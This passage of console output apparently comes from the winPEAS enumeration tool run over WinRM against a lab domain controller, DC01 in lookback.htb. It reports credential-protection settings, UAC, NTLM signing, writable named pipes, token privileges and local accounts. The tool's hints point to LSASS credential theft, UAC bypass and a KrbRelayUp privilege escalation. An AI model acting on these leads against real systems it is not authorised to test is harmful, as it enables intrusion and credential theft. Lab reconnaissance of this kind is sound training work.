WINRM       172.16.55.128   5985   DC01                 COMPUTERNAME: DC01
WINRM       172.16.55.128   5985   DC01                 PUBLIC: C:\Users\Public
WINRM       172.16.55.128   5985   DC01                 LOCALAPPDATA: C:\Users\administrator .LOOKBACK\AppData\Local
WINRM       172.16.55.128   5985   DC01                 PSModulePath: C:\Users\administrator .LOOKBACK\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\Microsoft SQL Server\160\Tools\PowerShell\Modules\
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_ARCHITECTURE: AMD64
WINRM       172.16.55.128   5985   DC01                 Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files (x86)\Microsoft SQL Server\160\Tools\Binn\;C:\Program Files\Microsoft SQL Server\160\Tools\Binn\;C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\;C:\Program Files\Microsoft SQL Server\160\DTS\Binn\;C:\Users\administrator .LOOKBACK\AppData\Local\Microsoft\WindowsApps
WINRM       172.16.55.128   5985   DC01                 CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
WINRM       172.16.55.128   5985   DC01                 ProgramFiles(x86): C:\Program Files (x86)
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_LEVEL: 25
WINRM       172.16.55.128   5985   DC01                 ProgramFiles: C:\Program Files
WINRM       172.16.55.128   5985   DC01                 PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
WINRM       172.16.55.128   5985   DC01                 USERPROFILE: C:\Users\administrator .LOOKBACK
WINRM       172.16.55.128   5985   DC01                 SystemRoot: C:\Windows
WINRM       172.16.55.128   5985   DC01                 ALLUSERSPROFILE: C:\ProgramData
WINRM       172.16.55.128   5985   DC01                 DriverData: C:\Windows\System32\Drivers\DriverData
WINRM       172.16.55.128   5985   DC01                 ProgramData: C:\ProgramData
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_REVISION: 4401
WINRM       172.16.55.128   5985   DC01                 USERNAME: administrator
WINRM       172.16.55.128   5985   DC01                 CommonProgramW6432: C:\Program Files\Common Files
WINRM       172.16.55.128   5985   DC01                 CommonProgramFiles: C:\Program Files\Common Files
WINRM       172.16.55.128   5985   DC01                 OS: Windows_NT
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 68 Stepping 1, AuthenticAMD
WINRM       172.16.55.128   5985   DC01                 ComSpec: C:\Windows\system32\cmd.exe
WINRM       172.16.55.128   5985   DC01                 SystemDrive: C:
WINRM       172.16.55.128   5985   DC01                 TEMP: C:\Users\ADMINI~1.LOO\AppData\Local\Temp
WINRM       172.16.55.128   5985   DC01                 NUMBER_OF_PROCESSORS: 4
WINRM       172.16.55.128   5985   DC01                 APPDATA: C:\Users\administrator .LOOKBACK\AppData\Roaming
WINRM       172.16.55.128   5985   DC01                 TMP: C:\Users\ADMINI~1.LOO\AppData\Local\Temp
WINRM       172.16.55.128   5985   DC01                 ProgramW6432: C:\Program Files
WINRM       172.16.55.128   5985   DC01                 windir: C:\Windows
WINRM       172.16.55.128   5985   DC01                 USERDOMAIN: LOOKBACK
WINRM       172.16.55.128   5985   DC01                 USERDNSDOMAIN: lookback.htb
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ System Environment Variables
WINRM       172.16.55.128   5985   DC01             È Check for some passwords or keys in the env variables                                                                                                     
WINRM       172.16.55.128   5985   DC01                 ComSpec: C:\Windows\system32\cmd.exe
WINRM       172.16.55.128   5985   DC01                 DriverData: C:\Windows\System32\Drivers\DriverData
WINRM       172.16.55.128   5985   DC01                 OS: Windows_NT
WINRM       172.16.55.128   5985   DC01                 Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files (x86)\Microsoft SQL Server\160\Tools\Binn\;C:\Program Files\Microsoft SQL Server\160\Tools\Binn\;C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\;C:\Program Files\Microsoft SQL Server\160\DTS\Binn\
WINRM       172.16.55.128   5985   DC01                 PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_ARCHITECTURE: AMD64
WINRM       172.16.55.128   5985   DC01                 PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\Microsoft SQL Server\160\Tools\PowerShell\Modules\
WINRM       172.16.55.128   5985   DC01                 TEMP: C:\Windows\TEMP
WINRM       172.16.55.128   5985   DC01                 TMP: C:\Windows\TEMP
WINRM       172.16.55.128   5985   DC01                 USERNAME: SYSTEM
WINRM       172.16.55.128   5985   DC01                 windir: C:\Windows
WINRM       172.16.55.128   5985   DC01                 NUMBER_OF_PROCESSORS: 4
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_LEVEL: 25
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 68 Stepping 1, AuthenticAMD
WINRM       172.16.55.128   5985   DC01                 PROCESSOR_REVISION: 4401
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Audit Settings
WINRM       172.16.55.128   5985   DC01             È Check what is being logged 
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Audit Policy Settings - Classic & Advanced                                                                                                     
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ WEF Settings
WINRM       172.16.55.128   5985   DC01             È Windows Event Forwarding, is interesting to know were are sent the logs                                                                                   
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ LAPS Settings
WINRM       172.16.55.128   5985   DC01             È If installed, local administrator password is changed frequently and is restricted by ACL                                                                 
WINRM       172.16.55.128   5985   DC01                 LAPS Enabled: LAPS not installed
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Wdigest
WINRM       172.16.55.128   5985   DC01             È If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wdigest                                                                                                      
WINRM       172.16.55.128   5985   DC01                 Wdigest is not enabled
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ LSA Protection
WINRM       172.16.55.128   5985   DC01             È If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#lsa-protection             
WINRM       172.16.55.128   5985   DC01                 LSA Protection is not enabled
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Credentials Guard
WINRM       172.16.55.128   5985   DC01             È If enabled, a driver is needed to read LSASS memory https://book.hacktricks.wiki/windows-hardening/stealing-credentials/credentials-protections#credentials-guard                                                                                                 
WINRM       172.16.55.128   5985   DC01                 CredentialGuard is not enabled
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Cached Creds
WINRM       172.16.55.128   5985   DC01             È If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#cached-credentials                                                               
WINRM       172.16.55.128   5985   DC01                 cachedlogonscount is 10
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating saved credentials in Registry (CurrentPass)                                                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ AV Information
WINRM       172.16.55.128   5985   DC01               [X] Exception: Invalid namespace 
WINRM       172.16.55.128   5985   DC01                 No AV was detected!!
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Windows Defender configuration
WINRM       172.16.55.128   5985   DC01               Local Settings
WINRM       172.16.55.128   5985   DC01               Group Policy Settings
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ UAC Status
WINRM       172.16.55.128   5985   DC01             È If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#from-administrator-medium-to-high-integrity-level--uac-bypasss                                 
WINRM       172.16.55.128   5985   DC01                 ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries                                                                                             
WINRM       172.16.55.128   5985   DC01                 EnableLUA: 1
WINRM       172.16.55.128   5985   DC01                 LocalAccountTokenFilterPolicy: 
WINRM       172.16.55.128   5985   DC01                 FilterAdministratorToken: 
WINRM       172.16.55.128   5985   DC01                   [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.                                                                         
WINRM       172.16.55.128   5985   DC01                   [-] Only the RID-500 local admin account can be used for lateral movement.                                                                            
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ PowerShell Settings
WINRM       172.16.55.128   5985   DC01                 PowerShell v2 Version: 2.0
WINRM       172.16.55.128   5985   DC01                 PowerShell v5 Version: 5.1.20348.1
WINRM       172.16.55.128   5985   DC01                 PowerShell Core Version: 
WINRM       172.16.55.128   5985   DC01                 Transcription Settings: 
WINRM       172.16.55.128   5985   DC01                 Module Logging Settings: 
WINRM       172.16.55.128   5985   DC01                 Scriptblock Logging Settings: 
WINRM       172.16.55.128   5985   DC01                 PS history file: 
WINRM       172.16.55.128   5985   DC01                 PS history size: 
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating PowerShell Session Settings using the registry                                                                                     
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ PS default transcripts history
WINRM       172.16.55.128   5985   DC01             È Read the PS history inside these files (if any)
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ HKCU Internet Settings
WINRM       172.16.55.128   5985   DC01                 CertificateRevocation: 1
WINRM       172.16.55.128   5985   DC01                 DisableCachingOfSSLPages: 0
WINRM       172.16.55.128   5985   DC01                 IE5_UA_Backup_Flag: 5.0
WINRM       172.16.55.128   5985   DC01                 PrivacyAdvanced: 1
WINRM       172.16.55.128   5985   DC01                 SecureProtocols: 10240
WINRM       172.16.55.128   5985   DC01                 User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
WINRM       172.16.55.128   5985   DC01                 ZonesSecurityUpgrade: System.Byte[]
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ HKLM Internet Settings
WINRM       172.16.55.128   5985   DC01                 ActiveXCache: C:\Windows\Downloaded Program Files
WINRM       172.16.55.128   5985   DC01                 CodeBaseSearchPath: CODEBASE
WINRM       172.16.55.128   5985   DC01                 EnablePunycode: 1
WINRM       172.16.55.128   5985   DC01                 MinorVersion: 0
WINRM       172.16.55.128   5985   DC01                 WarnOnIntranet: 1
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Drives Information
WINRM       172.16.55.128   5985   DC01             È Remember that you should search more info inside the other drives                                                                                         
WINRM       172.16.55.128   5985   DC01                 C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 41 GB)(Permissions: Users [Allow: AppendData/CreateDirectories])                                   
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking WSUS
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wsus                                                     
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking KrbRelayUp
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#krbrelayup                                               
WINRM       172.16.55.128   5985   DC01               The system is inside a domain (LOOKBACK) so it could be vulnerable.                                                                                       
WINRM       172.16.55.128   5985   DC01             È You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges                                                                                   
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking If Inside Container
WINRM       172.16.55.128   5985   DC01             È If the binary cexecsvc.exe or associated service exists, you are inside Docker                                                                            
WINRM       172.16.55.128   5985   DC01             You are NOT inside a container
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking AlwaysInstallElevated
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated                                    
WINRM       172.16.55.128   5985   DC01                 AlwaysInstallElevated isn't available
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerate LSA settings - auth packages included                                                                                                
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 auditbasedirectories                 :       0
WINRM       172.16.55.128   5985   DC01                 auditbaseobjects                     :       0
WINRM       172.16.55.128   5985   DC01                 Bounds                               :       00-30-00-00-00-20-00-00                                                                                    
WINRM       172.16.55.128   5985   DC01                 crashonauditfail                     :       0
WINRM       172.16.55.128   5985   DC01                 fullprivilegeauditing                :       00
WINRM       172.16.55.128   5985   DC01                 LimitBlankPasswordUse                :       1
WINRM       172.16.55.128   5985   DC01                 NoLmHash                             :       1
WINRM       172.16.55.128   5985   DC01                 Security Packages                    :       ""
WINRM       172.16.55.128   5985   DC01                 Notification Packages                :       rassfm,scecli                                                                                              
WINRM       172.16.55.128   5985   DC01                 Authentication Packages              :       msv1_0                                                                                                     
WINRM       172.16.55.128   5985   DC01                 LsaPid                               :       652
WINRM       172.16.55.128   5985   DC01                 LsaCfgFlagsDefault                   :       0
WINRM       172.16.55.128   5985   DC01                 SecureBoot                           :       1
WINRM       172.16.55.128   5985   DC01                 ProductType                          :       7
WINRM       172.16.55.128   5985   DC01                 disabledomaincreds                   :       0
WINRM       172.16.55.128   5985   DC01                 everyoneincludesanonymous            :       0
WINRM       172.16.55.128   5985   DC01                 forceguest                           :       0
WINRM       172.16.55.128   5985   DC01                 restrictanonymous                    :       0
WINRM       172.16.55.128   5985   DC01                 restrictanonymoussam                 :       1
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating NTLM Settings
WINRM       172.16.55.128   5985   DC01               LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default)                                                                                
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               NTLM Signing Settings
WINRM       172.16.55.128   5985   DC01                   ClientRequireSigning    : False
WINRM       172.16.55.128   5985   DC01                   ClientNegotiateSigning  : True
WINRM       172.16.55.128   5985   DC01                   ServerRequireSigning    : True
WINRM       172.16.55.128   5985   DC01                   ServerNegotiateSigning  : True
WINRM       172.16.55.128   5985   DC01                   LdapSigning             : Negotiate signing (Negotiate signing)                                                                                       
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Session Security
WINRM       172.16.55.128   5985   DC01                   NTLMMinClientSec        : 536870912 (Require 128-bit encryption)                                                                                      
WINRM       172.16.55.128   5985   DC01                   NTLMMinServerSec        : 536870912 (Require 128-bit encryption)                                                                                      
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               NTLM Auditing and Restrictions
WINRM       172.16.55.128   5985   DC01                   InboundRestrictions     :  (Not defined)
WINRM       172.16.55.128   5985   DC01                   OutboundRestrictions    :  (Not defined)
WINRM       172.16.55.128   5985   DC01                   InboundAuditing         :  (Not defined)
WINRM       172.16.55.128   5985   DC01                   OutboundExceptions      :
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Display Local Group Policy settings - local users/machine                                                                                      
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Potential GPO abuse vectors (applied domain GPOs writable by current user)                                                                     
WINRM       172.16.55.128   5985   DC01                 No obvious GPO abuse via writable SYSVOL paths or GPCO membership detected.                                                                             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking AppLocker effective policy
WINRM       172.16.55.128   5985   DC01                AppLockerPolicy version: 1
WINRM       172.16.55.128   5985   DC01                listing rules:
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Printers (WMI)
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Named Pipes
WINRM       172.16.55.128   5985   DC01               Name                                                                                                 CurrentUserPerms                                                       Sddl                                                                                  
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               eventlog                                                                                             Everyone [Allow: WriteData/CreateFiles]                                O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               RpcProxy\49677                                                                                       Everyone [Allow: WriteData/CreateFiles]                                O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               RpcProxy\593                                                                                         Everyone [Allow: WriteData/CreateFiles]                                O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               sql\query                                                                                            Everyone [Allow: WriteData/CreateFiles]                                O:S-1-5-21-3830242231-3868280746-2763890440-1106G:DUD:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-3830242231-3868280746-2763890440-1106)
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               SQLLocal\MSSQLSERVER                                                                                 Everyone [Allow: WriteData/CreateFiles]                                O:S-1-5-21-3830242231-3868280746-2763890440-1106G:DUD:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-3830242231-3868280746-2763890440-1106)
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               vgauth-service                                                                                       Everyone [Allow: WriteData/CreateFiles]                                O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating AMSI registered providers
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Sysmon configuration
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Sysmon process creation logs (1)                                                                                                   
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Installed .NET versions
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Interesting Events information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                  
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Printing Explicit Credential Events (4648) for last 30 days - A process logged on using plaintext credentials                                  
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Printing Account Logon Events (4624) for the last 10 days.                                                                                     
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Process creation events - searching logs (EID 4688) for sensitive data.                                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ PowerShell events - script block logs (EID 4104) - searching for sensitive data.                                                               
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               [X] Exception: Attempted to perform an unauthorized operation.                                                                                            
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Displaying Power off/on events for last 5 days                                                                                                 
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             System.UnauthorizedAccessException: Attempted to perform an unauthorized operation.                                                                         
WINRM       172.16.55.128   5985   DC01                at System.Diagnostics.Eventing.Reader.EventLogException.Throw(Int32 errorCode)                                                                           
WINRM       172.16.55.128   5985   DC01                at System.Diagnostics.Eventing.Reader.NativeWrapper.EvtQuery(EventLogHandle session, String path, String query, Int32 flags)                             
WINRM       172.16.55.128   5985   DC01                at System.Diagnostics.Eventing.Reader.EventLogReader..ctor(EventLogQuery eventQuery, EventBookmark bookmark)                                             
WINRM       172.16.55.128   5985   DC01                at winPEAS.Helpers.MyUtils.GetEventLogReader(String path, String query, String computerName)                                                             
WINRM       172.16.55.128   5985   DC01                at winPEAS.Info.EventsInfo.Power.Power.<GetPowerEventInfos>d__0.MoveNext()                                                                               
WINRM       172.16.55.128   5985   DC01                at winPEAS.Checks.EventsInfo.PowerOnEvents()
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Users Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                               
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Users
WINRM       172.16.55.128   5985   DC01             È Check if you have some admin equivalent privileges https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#users--groups                                                                                                  
WINRM       172.16.55.128   5985   DC01               [X] Exception: Object reference not set to an instance of an object.                                                                                      
WINRM       172.16.55.128   5985   DC01               Current user: administrator 
WINRM       172.16.55.128   5985   DC01               Current groups: Domain Users, Everyone, Builtin\Remote Management Users, Users, Builtin\Pre-Windows 2000 Compatible Access, Builtin\Certificate Service DCOM Access, Network, Authenticated Users, This Organization, IT, NTLM Authentication                     
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Current User Idle Time
WINRM       172.16.55.128   5985   DC01                Current User   :     LOOKBACK\administrator
WINRM       172.16.55.128   5985   DC01                Idle Time      :     03h:26m:17s:156ms
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Display Tenant information (DsRegCmd.exe /status)                                                                                              
WINRM       172.16.55.128   5985   DC01                Tenant is NOT Azure AD Joined.
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Current Token privileges
WINRM       172.16.55.128   5985   DC01             È Check if you can escalate privilege using some enabled token https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#token-manipulation                                                                                   
WINRM       172.16.55.128   5985   DC01                 SeMachineAccountPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
WINRM       172.16.55.128   5985   DC01                 SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
WINRM       172.16.55.128   5985   DC01                 SeIncreaseWorkingSetPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Clipboard text
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Logged users
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access denied 
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Display information about local users
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
WINRM       172.16.55.128   5985   DC01                User Name               :   Administrator
WINRM       172.16.55.128   5985   DC01                User Id                 :   500
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   True
WINRM       172.16.55.128   5985   DC01                User Type               :   Administrator
WINRM       172.16.55.128   5985   DC01                Comment                 :   Built-in account for administering the computer/domain                                                                       
WINRM       172.16.55.128   5985   DC01                Last Logon              :   4/7/2026 7:37:27 PM
WINRM       172.16.55.128   5985   DC01                Logons Count            :   14
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   10/17/2025 11:08:02 AM                                                                                                       
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
WINRM       172.16.55.128   5985   DC01                User Name               :   Guest
WINRM       172.16.55.128   5985   DC01                User Id                 :   501
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   False
WINRM       172.16.55.128   5985   DC01                User Type               :   Guest
WINRM       172.16.55.128   5985   DC01                Comment                 :   Built-in account for guest access to the computer/domain                                                                     
WINRM       172.16.55.128   5985   DC01                Last Logon              :   1/1/1970 12:00:00 AM
WINRM       172.16.55.128   5985   DC01                Logons Count            :   0
WINRM       172.16.55.128   5985   DC01                Password Last Set       :   1/1/1970 12:00:00 AM
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                Computer Name           :   DC01
WINRM       172.16.55.128   5985   DC01                User Name               :   krbtgt
WINRM       172.16.55.128   5985   DC01                User Id                 :   502
WINRM       172.16.55.128   5985   DC01                Is Enabled              :   False
WINRM       172.16.55.128   5985   DC01                User Type               :   User
WINRM       172.16.55.128   5985   DC01                Comment                 :   Key Distribution Center Service Account                                                                                      
